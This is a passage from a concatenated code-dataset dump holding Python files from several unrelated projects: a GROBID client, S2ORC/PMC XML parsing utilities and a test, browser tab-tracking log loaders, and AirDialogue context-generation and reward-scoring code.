'affiliations': aff_string
}
the_url = 'http://' + self.grobid_server
the_url += ":" + self.grobid_port
the_url += "/api/processAffiliations"
res, status = self.post(
url=the_url,
data=the_data,
headers={'Accept': 'text/plain'}
)
if status == 503:
time.sleep(self.sleep_time)
return self.process_affiliations(aff_string, log_file)
elif status != 200:
with open(log_file, "a+") as failed:
failed.write("-- AFFILIATION --\n")
failed.write(aff_string + "\n\n")
else:
return res.text
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Client for GROBID services")
parser.add_argument("service", help="one of [processFulltextDocument, processHeaderDocument, processReferences]")
parser.add_argument("--input", default=None, help="path to the directory containing PDF to process")
parser.add_argument("--output", default=None, help="path to the directory where to put the results")
parser.add_argument("--config", default=None, help="path to the config file, default is ./config.json")
args = parser.parse_args()
input_path = args.input
config = json.load(open(args.config)) if args.config else DEFAULT_GROBID_CONFIG
output_path = args.output
service = args.service
client = GrobidClient(config=config)
start_time = time.time()
client.process(input_path, output_path, service)
runtime = round(time.time() - start_time, 3)
print("runtime: %s seconds " % (runtime))
```
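For reference, a minimal sketch of driving the client above; it assumes a GROBID server is already reachable at the configured host and port, and the directory paths are placeholders:
```python
# Process a directory of PDFs into TEI XML (paths are hypothetical).
client = GrobidClient(config=DEFAULT_GROBID_CONFIG)
client.process('./pdfs', './tei_out', 'processFulltextDocument')
# Failures are appended to ./tei_out/failed.log by process_pdf_stream.
```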
#### File: jats2json/pmc_utils/back_tag_utils.py
```python
from typing import Dict, List
def _wrap_text(tag):
return tag.text if tag else ''
def parse_authors(authors_tag) -> List:
"""The PMC XML has a slightly different format than authors listed in front tag."""
if not authors_tag:
return []
authors = []
for name_tag in authors_tag.find_all('name', recursive=False):
surname = name_tag.find('surname')
given_names = name_tag.find('given-names')
given_names = given_names.text.split(' ') if given_names else None
suffix = name_tag.find('suffix')
authors.append({
'first': given_names[0] if given_names else '',
'middle': given_names[1:] if given_names else [],
'last': surname.text if surname else '',
'suffix': suffix.text if suffix else ''
})
return authors
def parse_bib_entries(back_tag) -> Dict:
bib_entries = {}
# TODO: PMC2778891 does not have 'ref-list' in its back_tag. do we even need this, or can directly .find_all('ref')?
ref_list_tag = back_tag.find('ref-list')
if ref_list_tag:
for ref_tag in ref_list_tag.find_all('ref'):
# The ref ID and label are semantically swapped between CORD-19 and PMC, lol
ref_label = ref_tag['id']
ref_id = ref_tag.find('label')
authors_tag = ref_tag.find('person-group', {'person-group-type': 'author'})
year = ref_tag.find('year')
fpage = ref_tag.find('fpage')
lpage = ref_tag.find('lpage')
pages = f'{fpage.text}-{lpage.text}' if fpage and lpage else None
dois = [tag.text for tag in ref_tag.find_all('pub-id', {'pub-id-type': 'doi'})]
bib_entries[ref_label] = {
'ref_id': _wrap_text(ref_id),
'title': _wrap_text(ref_tag.find('article-title')),
'authors': parse_authors(authors_tag),
'year': int(year.text) if year and year.text.isdigit() else None,
'venue': _wrap_text(ref_tag.find('source')),
'volume': _wrap_text(ref_tag.find('volume')),
'issn': _wrap_text(ref_tag.find('issue')),
'pages': pages,
'other_ids': {
'DOI': dois,
}
}
return bib_entries
```
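To make the tag handling above concrete, here is a small hypothetical check for parse_bib_entries; it assumes beautifulsoup4 (with the lxml XML parser) is installed, which the surrounding pipeline already relies on for the soup tags it passes in:
```python
# Assumes parse_bib_entries / parse_authors from the module above are in scope.
from bs4 import BeautifulSoup

xml = """
<back><ref-list>
  <ref id="B1">
    <label>1</label>
    <person-group person-group-type="author">
      <name><surname>Smith</surname><given-names>Jane A</given-names></name>
    </person-group>
    <article-title>An example title</article-title>
    <source>Example Journal</source>
    <year>2019</year><fpage>10</fpage><lpage>20</lpage>
    <pub-id pub-id-type="doi">10.1000/example</pub-id>
  </ref>
</ref-list></back>
"""
back_tag = BeautifulSoup(xml, 'xml').find('back')
entries = parse_bib_entries(back_tag)
assert entries['B1']['pages'] == '10-20'
assert entries['B1']['authors'][0]['last'] == 'Smith'
```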
#### File: jats2json/pmc_utils/front_tag_utils.py
```python
from typing import Dict, List, Optional
from collections import Counter
import re
from doc2json.jats2json.pmc_utils.all_tag_utils import recurse_parse_section, parse_all_paragraphs_in_section, \
replace_sup_sub_tags_with_string_placeholders, replace_xref_with_string_placeholders
class NoAuthorNamesError(Exception):
"""Known papers that trigger:
- PMC3462967
"""
pass
def parse_journal_id_tag(front_tag) -> str:
"""
front_tag.find_all('journal-id') returns:
[
<journal-id journal-id-type="nlm-ta">Neurosci J</journal-id>,
<journal-id journal-id-type="iso-abbrev">Neurosci J</journal-id>,
<journal-id journal-id-type="publisher-id">NEUROSCIENCE</journal-id>
]
[
<journal-id journal-id-type="nlm-ta">BMC Biochem</journal-id>
<journal-id journal-id-type="iso-abbrev">BMC Biochem</journal-id>
]
"""
c = Counter()
for tag in front_tag.find_all('journal-id'):
c[tag.text] += 1
tag.decompose()
journal_id, n = c.most_common(1)[0]
return journal_id
def parse_journal_name_tag(front_tag) -> str:
"""
Examples:
# Paper 1
<journal-title-group>
<journal-title>BMC Biochemistry</journal-title>
</journal-title-group>
# Paper 2
<journal-title-group>
<journal-title>Neuroscience Journal</journal-title>
</journal-title-group>
But not all titles are contained within a `journal-title-group`. See PMC1079901
<journal-meta>
<journal-id journal-id-type="nlm-ta">
Biomed Eng Online
</journal-id>
<journal-title>
BioMedical Engineering OnLine
</journal-title>
...
"""
if len(front_tag.find_all('journal-title')) > 1:
raise Exception('Multiple journal titles?!')
return front_tag.find('journal-title').extract().text
def parse_pubmed_id_tag(front_tag) -> Optional[str]:
"""Not every PMC paper has a PMID """
pmid_tag = front_tag.find('article-id', {'pub-id-type': 'pmid'})
if pmid_tag is None:
return None
else:
return pmid_tag.extract().text
def parse_pmc_id_tag(front_tag) -> str:
return f"PMC{front_tag.find('article-id', {'pub-id-type': 'pmc'}).extract().text}"
def parse_doi_tag(front_tag) -> Optional[str]:
"""Not all papers have a DOI"""
doi_tag = front_tag.find('article-id', {'pub-id-type': 'doi'})
if doi_tag is not None:
return doi_tag.extract().text
else:
return None
def parse_title_tag(front_tag) -> str:
"""
Examples:
# Paper 1
<title-group>
<article-title>Role of the highly conserved G68 residue in the yeast phosphorelay protein Ypd1: implications for interactions between histidine phosphotransfer (HPt) and response regulator proteins</article-title>
</title-group>
# Paper 2
<title-group>
<article-title>Association of Strength and Physical Functions in People with Parkinson's Disease</article-title>
</title-group>
Want to restrict to `title-group` because sometimes title shows up in <notes> under self-citation
"""
title_group = front_tag.find('title-group').extract()
if len(title_group.find_all('article-title')) > 1:
raise Exception('Multiple article titles?!')
return title_group.find('article-title').text
def parse_category_tag(front_tag) -> str:
"""
Examples:
# Paper 1
<article-categories>
<subj-group subj-group-type="heading">
<subject>Research Article</subject>
</subj-group>
</article-categories>
# Paper 2
<article-categories>
<subj-group subj-group-type="heading">
<subject>Research Article</subject>
</subj-group>
</article-categories>
"""
if len(front_tag.find_all('subj-group')) > 1 or len(front_tag.find_all('subject')) > 1:
raise Exception('Multiple categories?!')
article_categories = front_tag.find('article-categories').extract()
return article_categories.find('subject').text
def parse_date_tag(front_tag) -> Dict:
"""
Two sets of tags contain dates:
<pub-date pub-type="collection">
<year>2018</year>
</pub-date>
<pub-date pub-type="epub">
<day>12</day>
<month>12</month>
<year>2018</year>
</pub-date>
And:
<history>
<date date-type="received">
<day>15</day>
<month>10</month>
<year>2018</year>
</date>
<date date-type="rev-recd">
<day>20</day>
<month>11</month>
<year>2018</year>
</date>
<date date-type="accepted">
<day>26</day>
<month>11</month>
<year>2018</year>
</date>
</history>
PMC2557072 has `date` tag with no `day`, only `year` and `month`
"""
out = {}
for pub_date in front_tag.find_all('pub-date'):
year = pub_date.find('year')
month = pub_date.find('month')
day = pub_date.find('day')
out[pub_date.get('pub-type', 'MISSING_PUB_TYPE')] = '-'.join([tag.text for tag in [year, month, day] if tag is not None])
pub_date.decompose()
for date in front_tag.find_all('date'):
year = date.find('year')
month = date.find('month')
day = date.find('day')
out[date.get('date-type', 'MISSING_DATE_TYPE')] = '-'.join([tag.text for tag in [year, month, day] if tag is not None])
date.decompose()
return out
def parse_funding_groups(front_tag) -> List[str]:
outs = []
for tag in front_tag.find_all():
# AND statement skips cases where the two tag types nest within each other; we only process the inner one
if (tag.name == 'funding-source' or tag.name == 'funding-statement') and tag.find('funding-source') is None and tag.find('funding-statement') is None:
out = {
'name': None,
'doi': None,
'notes': None,
# 'raw': str(tag) # for debugging
}
# handle institution
institution_id_tag = tag.find('institution-id')
if institution_id_tag:
out['doi'] = institution_id_tag.extract().text.replace('http://dx.doi.org/', '')
institution_tag = tag.find('institution')
if institution_tag:
out['name'] = tag.find('institution').extract().text
# handle named content
funder_name_tag = tag.find('named-content', {'content-type': 'funder-name'})
if funder_name_tag:
out['name'] = funder_name_tag.extract().text
funder_id_tag = tag.find('named-content', {'content-type': 'funder-identifier'})
if funder_id_tag:
out['doi'] = funder_id_tag.extract().text.replace('http://dx.doi.org/', '')
# handle urls
if tag.get('xlink:href'):
out['doi'] = tag['xlink:href']
# fix DOIs with URLs in them
if out['doi']:
match = re.search(r'http(s?)://dx.doi.org/(.+)', out['doi'])
if match:
out['doi'] = match.group(2)
# remainder text is either a name or a full statement
text = tag.text
if tag.name == 'funding-statement' or ('fund' in text or 'support' in text or 'provide' in text):
out['notes'] = text
else:
# what if something already in 'name'? observed it's typically empty string; so ignore.
if not out['name']:
out['name'] = text
# if DOI link is in the name, remove it and parse (PMC5407128)
if out['name'] and not out['doi']:
pattern = r'\s*http(s?)://dx.doi.org/(.+)$'
match = re.search(pattern, out['name'])
if match:
out['doi'] = match.group(2)
out['name'] = re.sub(pattern, r'', out['name'])
outs.append(out)
return outs
# TODO: didnt want to handle <collab> group names; seemed rare and inconsistent; focus on <contrib> with <name> and <aff>
def parse_authors(front_tag) -> List[Dict]:
authors = []
for contrib_tag in front_tag.find_all('contrib'):
# skip nesting; just process children (individual authors)
if contrib_tag.find_all('contrib'):
continue
# skip contribs without a name; these should be ones that consist of <collab> tag
if contrib_tag.find('name') is None:
continue
# corresponding tag
if (contrib_tag.get('corresp') == 'yes') or (contrib_tag.find('xref', {'ref-type': 'corresp'})):
is_corresp = True
else:
is_corresp = False
# orcid ID is sometimes a URL or just a number. standardize as hyphenized number.
if contrib_tag.find('contrib-id'):
orcid_id = contrib_tag.find('contrib-id').text
match = re.search(r'http(s?)://orcid.org/(.+)', orcid_id)
if match:
orcid_id = match.group(2)
# A very small number of articles have ID type CATS, which we don't handle. For example:
# /disk2/gorpus/20200101/pmc/Change/PMC6176774.nxml
if len(orcid_id) != 19:
orcid_id = None
else:
orcid_id = None
# Email may or may not be present.
email = contrib_tag.find('email')
email = email.text if email else None
# Get the name info for the author.
name_info = {name_tag.name: name_tag.text for name_tag in contrib_tag.find('name').find_all()}
# TODO: PMC3462967 is an Erratum. It does not have ['given-names']. not sure we care about those, so try-catch for now
try:
given_names = name_info['given-names'].split(' ')
except KeyError as e:
raise NoAuthorNamesError
authors.append({
'first': given_names[0] if given_names else None,
'middle': given_names[1:] if given_names else None,
'last': name_info['surname'],
'suffix': name_info.get('suffix', ''),
'email': email,
'affiliation_ids': [xref_tag.get('rid') for xref_tag in contrib_tag.find_all('xref', {'ref-type': 'aff'})],
'corresponding': is_corresp,
'orcid': orcid_id
})
# authors.append(str(contrib_tag.extract()))
return authors
def parse_affiliations(front_tag) -> List[Dict]:
"""
Sometimes affiliations is nested within '<contrib-group>' along with
authors. Sometimes, they're not and listed outside as multiple tags.
Not all <aff> have IDs. For example:
<aff><NAME>, Minnesota</aff>
"""
outs = []
for aff_tag in front_tag.find_all('aff'):
if aff_tag.find('label'): # get rid of unused markers so `.text` is cleaner
aff_tag.find('label').decompose()
if aff_tag.find('sup'):
aff_tag.find('sup').decompose() # same treatment as label
aff_id = aff_tag.get('id')
# it looks like we want to go to the full affiliation surface form without worrying about all possible handlings of <named-content> and other fields
# BUT, we do want to keep ISNI and GRID IDs when they occur. They seem to occur typically within <institution-wrap>
# so let's handle those if they exist; safely decompose the tags (because they dont contribute to surface form); then grab remaining affiliation surface form
# implicit in this approach is that we dont need to actually handle <institution-wrap> tags because only one per affiliation
if len(aff_tag.find_all('institution-wrap')) > 1:
import pdb; pdb.set_trace()
id_type_to_id = {}
for institution_id_tag in aff_tag.find_all('institution-id'):
id_type_to_id[institution_id_tag['institution-id-type']] = institution_id_tag.text
institution_id_tag.decompose()
# TODO: processing of text: there are a lot of random newline chars (cuz XML preserves page layout)
# --> replace them with whitespace if there's preceding punctuation char
# --> otherwise, replace them with comma
text = aff_tag.text
outs.append({
'id': aff_id,
'other_ids': id_type_to_id,
'text': text
})
return outs
def parse_abstract_tag(front_tag, soup) -> List[Dict]:
"""Not every paper has an abstract
Furthermore, note very abstract is structured into sections.
Some abstracts (see PMC1914226) look like:
<abstract>
<p> ... </p>
<p> ... </p>
</abstract>
"""
# TODO: are there cases where <abstract> text <p> text </> </abstract> ?
abstract: List[Dict] = []
if front_tag.find('abstract'):
abstract_tag = front_tag.find('abstract').extract()
# replace all xref tags with string placeholders
replace_xref_with_string_placeholders(soup_tag=abstract_tag, soup=soup)
# replace all sup/sub tags with string placeholders
replace_sup_sub_tags_with_string_placeholders(soup_tag=abstract_tag, soup=soup)
if abstract_tag.find('sec'):
all_par_blobs = []
for sec_tag in abstract_tag.find_all('sec', recursive=False):
par_blobs = recurse_parse_section(sec_tag=sec_tag)
all_par_blobs.extend(par_blobs)
else:
all_par_blobs = parse_all_paragraphs_in_section(sec_tag=abstract_tag)
for par_blob in all_par_blobs:
# these 'sections' typically show up as empty string
par_blob['section'] = 'Abstract'
abstract.append(par_blob)
return abstract
```
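As a small illustration of the date handling above (hypothetical input, again assuming beautifulsoup4 with the lxml XML parser), pub-date and history dates are keyed by their type attributes and joined year-month-day:
```python
# Assumes parse_date_tag from the module above is in scope.
from bs4 import BeautifulSoup

front = BeautifulSoup(
    "<front>"
    "<pub-date pub-type='epub'><day>12</day><month>12</month><year>2018</year></pub-date>"
    "<history><date date-type='received'><month>10</month><year>2018</year></date></history>"
    "</front>", 'xml').find('front')
assert parse_date_tag(front) == {'epub': '2018-12-12', 'received': '2018-10'}
```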
#### File: doc2json/utils/refspan_util.py
```python
from typing import List, Tuple
def replace_refspans(
spans_to_replace: List[Tuple[int, int, str, str]],
full_string: str,
pre_padding: str = "",
post_padding: str = "",
btwn_padding: str = ", "
) -> str:
"""
For each span within the full string, replace that span with new text
:param spans_to_replace: list of tuples of form (start_ind, end_ind, span_text, new_substring)
:param full_string:
:param pre_padding:
:param post_padding:
:param btwn_padding:
:return:
"""
# assert all spans are equal to full_text span
assert all([full_string[start:end] == span for start, end, span, _ in spans_to_replace])
# assert none of the spans start with the same start ind
start_inds = [rep[0] for rep in spans_to_replace]
assert len(set(start_inds)) == len(start_inds)
# sort by start index
spans_to_replace.sort(key=lambda x: x[0])
# form strings for each span group
for i, entry in enumerate(spans_to_replace):
start, end, span, new_string = entry
# skip empties
if end <= 0:
continue
# compute shift amount
shift_amount = len(new_string) - len(span) + len(pre_padding) + len(post_padding)
# shift remaining appropriately
for ind in range(i + 1, len(spans_to_replace)):
next_start, next_end, next_span, next_string = spans_to_replace[ind]
# skip empties
if next_end <= 0:
continue
# if overlap between ref span and current ref span, remove from replacement
if next_start < end:
next_start = 0
next_end = 0
next_string = ""
# if ref span abuts previous reference span
elif next_start == end:
next_start += shift_amount
next_end += shift_amount
next_string = btwn_padding + pre_padding + next_string + post_padding
# if ref span starts after, shift starts and ends
elif next_start > end:
next_start += shift_amount
next_end += shift_amount
next_string = pre_padding + next_string + post_padding
# save adjusted span
spans_to_replace[ind] = (next_start, next_end, next_span, next_string)
spans_to_replace = [entry for entry in spans_to_replace if entry[1] > 0]
spans_to_replace.sort(key=lambda x: x[0])
# apply shifts in series
for start, end, span, new_string in spans_to_replace:
assert full_string[start:end] == span
full_string = full_string[:start] + new_string + full_string[end:]
return full_string
def sub_spans_and_update_indices(
spans_to_replace: List[Tuple[int, int, str, str]],
full_string: str
) -> Tuple[str, List]:
"""
Replace all spans and recompute indices
:param spans_to_replace:
:param full_string:
:return:
"""
# TODO: check no spans overlapping
# TODO: check all spans well-formed
# assert all spans are equal to full_text span
assert all([full_string[start:end] == token for start, end, token, _ in spans_to_replace])
# assert none of the spans start with the same start ind
start_inds = [rep[0] for rep in spans_to_replace]
assert len(set(start_inds)) == len(start_inds)
# sort by start index
spans_to_replace.sort(key=lambda x: x[0])
# compute offsets for each span
new_spans = [[start, end, token, surface, 0] for start, end, token, surface in spans_to_replace]
for i, entry in enumerate(spans_to_replace):
start, end, token, surface = entry
new_end = start + len(surface)
offset = new_end - end
new_spans[i][1] += offset
for new_span_entry in new_spans[i+1:]:
new_span_entry[4] += offset
# generate new text and create final spans
new_text = replace_refspans(spans_to_replace, full_string, btwn_padding="")
new_spans = [(start + offset, end + offset, token, surface) for start, end, token, surface, offset in new_spans]
return new_text, new_spans
```
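A small worked call makes the span bookkeeping in replace_refspans concrete (values are illustrative): later spans are shifted automatically as earlier replacements change the string length.
```python
text = "See [1] and [2]."
spans = [(4, 7, "[1]", "(Smith 2020)"), (12, 15, "[2]", "(Doe 2021)")]
assert replace_refspans(spans, text) == "See (Smith 2020) and (Doe 2021)."
```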
#### File: s2orc-doc2json/tests/test_read_write.py
```python
import os
import unittest
import json
from doc2json.s2orc import load_s2orc
JSON_INPUT_DATA = os.path.join('tests', 'pdf', 'N18-3011.json')
class TestS2ORC(unittest.TestCase):
def test_read_write(self):
"""
Check loading current s2orc files
:return:
"""
with open(JSON_INPUT_DATA, 'r') as f:
data = json.load(f)
try1 = load_s2orc(data)
output1 = try1.release_json("pdf")
try2 = load_s2orc(data)
output2 = try2.release_json("pdf")
for key, value in output2.items():
if key == 'header':
assert value != output1[key]
else:
assert value == output1[key]
``` |
{
"source": "josephcc/tab-track",
"score": 3
} |
#### File: tab-track/analysis/loaders.py
```python
import sys
import csv
from itertools import *
from bisect import *
from operator import *
from containers import *
from collections import defaultdict
def loadSnapshot(fn):
snapshots = []
with open(fn, 'rb') as csvfile:
snapshotRows = defaultdict(list)
csvreader = csv.reader(csvfile)
for row in csvreader:
if row[0] == 'snapshotId' or len(row) != 13:
continue
snapshotRows[row[0]].append(row)
for _, rows in snapshotRows.items():
snapshots.append(Snapshot(rows))
snapshots.sort(key=attrgetter('time'))
for tab in snapshots[0].tabs:
tab.init = True
snapshots[0].windows = list(set(map(attrgetter('windowId'), snapshots[0].tabs)))
for idx in range(len(snapshots) - 1):
fr = snapshots[idx]
to = snapshots[idx+1]
to.windows = list(set(map(attrgetter('windowId'), to.tabs)))
for tab in to.tabs:
tab.init = False
if tab.status == 'complete':
prevTab = fr.findTab(tab.id)
if prevTab != None and prevTab.status in ('complete', 'done'):
tab.status = 'done'
if tab.status == 'loading':
if (not fr.hasTab(tab.id)) or fr.findTab(tab.id).urlHash != tab.urlHash:
tab.init = True
fr.endTime = to.time
# skip last record because it has no endTime
snapshots.pop()
return snapshots
def loadFocus(fn):
focuses = []
with open(fn, 'rb') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
if row[0] == 'action' or len(row) != 4:
continue
focus = Focus(row)
focuses.append(focus)
focuses.sort(key=attrgetter('time'))
return focuses
def loadNav(fn):
navs = []
with open(fn, 'rb') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
if row[0] == 'from' or len(row) != 3:
continue
nav = Nav(row)
navs.append(nav)
navs.sort(key=attrgetter('time'))
return navs
def _trimByTime(a, s, e):
while a[0].time < s:
del a[0]
while a[-1].time > e:
del a[-1]
return a
def _getSnapshotForTime(snapshots, focus):
index = bisect_left(snapshots, focus)
snapshots = snapshots[max(0, index-5) : min(len(snapshots)-1, index+5)]
snapshots = filter(lambda snapshot: snapshot.hasTab(focus.id), snapshots)
diffs = []
for snapshot in snapshots:
diffs.append( abs(focus.time - snapshot.time) )
diffs = list(enumerate(diffs))
diffs.sort(key=itemgetter(1))
#_tabs = _.filter(tabs, (tab) -> tab.diff >= 500)
if len(diffs) > 0:
snapshots[diffs[0][0]].focuses.append(focus)
def addFocusToSnapshots(snapshots, focuses):
snapshots.sort(key=attrgetter('time'))
focuses.sort(key=attrgetter('time'))
snapshots = _trimByTime(snapshots, focuses[0].time, focuses[-1].time)
focuses = _trimByTime(focuses, snapshots[0].time, snapshots[-1].time)
for snapshot in snapshots:
snapshot.focuses = []
for focus in focuses:
_getSnapshotForTime(snapshots, focus)
lastFocus = None
for snapshot in snapshots:
snapshot.lastFocus = lastFocus
# fix race condition
for focus in snapshot.focuses:
focus.time = max(snapshot.time, focus.time)
focus.time = min(snapshot.endTime, focus.time)
if len(snapshot.focuses) > 0:
lastFocus = snapshot.focuses[-1]
return snapshots
def _getIdxForSnapshot(snapshot, snapshots):
index = bisect_left(snapshots, snapshot)
start = max(0, index-25)
end = min(len(snapshots)-1, index+25)
snapshots = snapshots[start:end]
_snapshotIdx = next(ifilter(lambda x: x[1].snapshotId == snapshot.snapshotId, enumerate(snapshots)))[0]
return _snapshotIdx + start
def _getTabForIdTime(frTabId, toTabId, time, snapshots):
index = bisect_left(snapshots, time)
start = max(0, index-25)
end = min(len(snapshots)-1, index+25)
snapshots = snapshots[start:end]
snapshots = filter(lambda snapshot: snapshot.hasTab(toTabId) and snapshot.hasTab(frTabId) and snapshot.findTab(toTabId).init, snapshots)
diffs = []
for snapshot in snapshots:
diffs.append( abs(time - snapshot.time) )
diffs = list(enumerate(diffs))
diffs.sort(key=itemgetter(1))
if len(diffs) > 0:
snapshot = snapshots[diffs[0][0]]
return snapshot, snapshot.findTab(frTabId), snapshot.findTab(toTabId)
return None, None, None
def addNavToSnapshots(snapshots, navs):
for nav in navs:
snapshot, fr, to = _getTabForIdTime(nav.source, nav.target, nav.time, snapshots)
if to != None and fr != None:
to.source = fr
# propagate source info to future snapshots
snapshotIdx = next(ifilter(lambda x: x[1].snapshotId == snapshot.snapshotId, enumerate(snapshots)))[0]
for idx in range(snapshotIdx, len(snapshots)):
snapshot = snapshots[idx]
# this will fail to propagate on redirection, as init will be set in that case
#if (not snapshot.hasTab(nav.target)) or snapshot.findTab(nav.target).init:
if (not snapshot.hasTab(nav.target)):
break
snapshot.findTab(nav.target).tabSource = fr
def loadEverything(snapshotFn, focusFn, navFn):
print >> sys.stderr, 'Loading tab logs...',
snapshots = loadSnapshot(snapshotFn)
print >> sys.stderr, ' Done\nLoading focus logs...',
focuses = loadFocus(focusFn)
print >> sys.stderr, ' Done\nLoading nav logs...',
navs = loadNav(navFn)
print >> sys.stderr, ' Done'
print >> sys.stderr, 'Mapping focus to snapshots...',
addFocusToSnapshots(snapshots, focuses)
print >> sys.stderr, ' Done\nMapping nav to snapshots...',
addNavToSnapshots(snapshots, navs)
print >> sys.stderr, ' Done'
return snapshots, focuses, navs
``` |
{
"source": "josephch405/airdialogue",
"score": 3
} |
#### File: context_generator/src/customer.py
```python
import random
from . import utils
class Customer(object):
"""This class contains information of a customer."""
def __init__(self, facts_obj, book_window, airport_list):
# 1. origin and destination, airport_list guarantees to have unique locations
self.origin = random.randint(0, len(airport_list) - 1)
self.dest = random.randint(0, len(airport_list) - 1)
if self.dest == self.origin:
self.dest = (self.dest + 1) % len(airport_list)
self.dest = airport_list[self.dest]
self.origin = airport_list[self.origin]
# 2. date
base_time = facts_obj.base_departure_time_epoch
a_year_from_now = base_time + 3600 * 24 * 365
# randomly pick a date between base_time and a_year_from_now
self.departure_date = random.randint(base_time, a_year_from_now)
# the return date is book_window days after the departure date
self.return_date = self.departure_date + 3600 * 24 * book_window
# 4. passenger information
num_passengers = 1
self.passengers = []
len_first_name = len(facts_obj.first_name_list)
len_last_name = len(facts_obj.last_name_list)
# '_' will later be replaced in intent standardization
for _ in range(num_passengers):
self.passengers.append(
facts_obj.first_name_list[random.randint(0, len_first_name - 1)] +
'_' + facts_obj.last_name_list[random.randint(0, len_last_name - 1)])
# non-required fields during initial query
# 3. time
self.departure_time = utils.choice(
facts_obj.time_list, 1, p=facts_obj.time_prior)[0]
self.return_time = utils.choice(
facts_obj.time_list, 1, p=facts_obj.time_prior)[0]
# 5. class limit and price limit
self.class_limit = utils.choice(
facts_obj.class_list, 1, p=facts_obj.class_list_prior)[0]
# 6. price limits
if self.class_limit == 'all':
self.price_limit = facts_obj.price_limit_list[random.randint(
0,
len(facts_obj.price_limit_list) - 1)]
elif self.class_limit == 'economy':
self.price_limit = facts_obj.price_limit_list[random.randint(
0,
len(facts_obj.price_limit_list) - 2)]
elif self.class_limit == 'business':
self.price_limit = facts_obj.price_limit_list[random.randint(
1,
len(facts_obj.price_limit_list) - 1)]
# 7. num of connections
self.max_connection = utils.choice(
facts_obj.connection_member, 1, p=facts_obj.connection_prior)[0]
# 8. airline preference
self.airline = utils.choice(
facts_obj.airline_preference, 1,
p=facts_obj.airline_preference_prior)[0]
# 10 post process
self.departure_month, self.departure_day = utils.get_month_and_day(
facts_obj, self.departure_date)
self.return_month, self.return_day = utils.get_month_and_day(
facts_obj, self.return_date)
# 11 change reservation
self.goal = utils.choice([0, 1, 2], p=facts_obj.goal_probaility)
def get_departure_and_return_date(self):
return self.departure_date, self.return_date
def get_json(self):
"""This function serializes the object into a json."""
intention_jobject = {}
intention_jobject['departure_airport'] = self.origin
intention_jobject['return_airport'] = self.dest
intention_jobject['departure_month'] = self.departure_month
intention_jobject['departure_day'] = self.departure_day
intention_jobject['return_month'] = self.return_month
intention_jobject['return_day'] = self.return_day
intention_jobject['name'] = self.passengers[0]
intention_jobject['departure_time'] = self.departure_time
intention_jobject['return_time'] = self.return_time
intention_jobject['class'] = self.class_limit
intention_jobject['max_price'] = self.price_limit
intention_jobject['max_connections'] = self.max_connection
intention_jobject['airline_preference'] = self.airline
intention_jobject['goal'] = self.goal
# add departure and return date
intention_jobject['departure_date'] = self.departure_date
intention_jobject['return_date'] = self.return_date
return intention_jobject
def get_customer_condition(self):
"""This function returns the condition file."""
condition = self.get_json()
if condition['airline_preference'] == 'all':
del condition['airline_preference']
if condition['max_connections'] == 2:
del condition['max_connections']
if condition['class'] == 'all':
del condition['class']
if condition['departure_time'] == 'all':
del condition['departure_time']
if condition['return_time'] == 'all':
del condition['return_time']
return condition
```
#### File: evaluator/metrics/f1.py
```python
from collections import Counter
import re
import string
def f1_score(prediction, ground_truth):
prediction_tokens = list(normalize_answer(prediction))
ground_truth_tokens = list(normalize_answer(ground_truth))
common = Counter(prediction_tokens) & Counter(ground_truth_tokens)
num_same = sum(common.values())
# print num_same, common
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
return re.sub(r'\b(a|an|the)\b', ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
```
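A quick illustration of the scoring above (hypothetical strings): note that wrapping normalize_answer's output in list() yields characters, so f1_score is effectively a character-level F1 after articles, punctuation, case, and extra whitespace are normalized away.
```python
assert normalize_answer("The New York!") == "new york"
assert f1_score("The New York!", "new york") == 1.0  # identical after normalization
```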
#### File: airdialogue/evaluator/selfplay_utils.py
```python
from airdialogue.evaluator.metrics.flight_distance import generate_scaled_flight
from airdialogue.evaluator.metrics import f1
def compute_reward_batch(utterance,
predicted_action,
actual_action_concat,
flight_db,
hparams,
alpha=0.5,
beta=0.2,
gamma=0.3):
"""Calcualte the reward for a batch."""
rewards = []
acc1 = []
acc2 = []
acc3 = []
discrete_score = []
ds1_arr = []
ds2_arr = []
ds3_arr = []
train_rw_arr = []
for pa, aa_con, fl in zip(predicted_action, actual_action_concat, flight_db):
aa = aa_con.split(' ')
rw, ac1, ac2, ac3 = compute_reward(pa, aa, fl)
rewards.append(rw)
acc1.append(ac1)
acc2.append(ac2)
acc3.append(ac3)
ds, ds1, ds2, ds3 = compute_01_score(pa, aa)
discrete_score.append(ds)
ds1_arr.append(ds1)
ds2_arr.append(ds2)
ds3_arr.append(ds3)
train_rw_arr.append(
get_training_reward(hparams, ac1, ac2, ac3, ds1, ds2, ds3))
return train_rw_arr, rewards, acc1, acc2, acc3, discrete_score, ds1_arr, ds2_arr, ds3_arr
def parse_action(action):
"""parse the action and consider multiple name scenario.
name will also appear first.
"""
name = ' '.join(action[0:-2])
flight = action[-2]
state = action[-1]
return name, flight, state
def compute_reward(predicted_action,
actual_action,
flight_db,
alpha=0.5,
beta=0.2,
gamma=0.3,
debug=False):
"""here we compute the scaled reward."""
predicted_name, predicted_flight, predicted_state = parse_action(
predicted_action)
actual_name, actual_flight, actual_state = parse_action(actual_action)
# this will do normalization including lower case and prouncation/space
# removal
score1 = f1.f1_score(predicted_name, actual_name)
score2 = 1 - generate_scaled_flight(predicted_flight, actual_flight,
flight_db)
score3 = float(predicted_state == actual_state)
# note: these fixed weights shadow the alpha/beta/gamma defaults above
reward_compliment = score1 * 0.2 + score2 * 0.5 + score3 * 0.3
acc1 = score1
acc2 = score2
acc3 = score3
return reward_compliment, acc1, acc2, acc3
```
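For reference, parse_action's multi-token name handling on an illustrative action (the flight number and state here are made-up values):
```python
assert parse_action(['jane', 'a', 'smith', '1012', 'book']) == ('jane a smith', '1012', 'book')
```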
#### File: airdialogue/prepro/standardize_data_lib.py
```python
from tensorflow.compat.v1.io import gfile
from tqdm import tqdm
import string
import json
printable = set(string.printable)
def add_dot(utt):
if utt.strip()[-1] != '.' and utt.strip()[-1] != '?':
return utt.strip() + '.'
else:
return utt.strip()
def standardize_message(utterances, time_stamp=None):
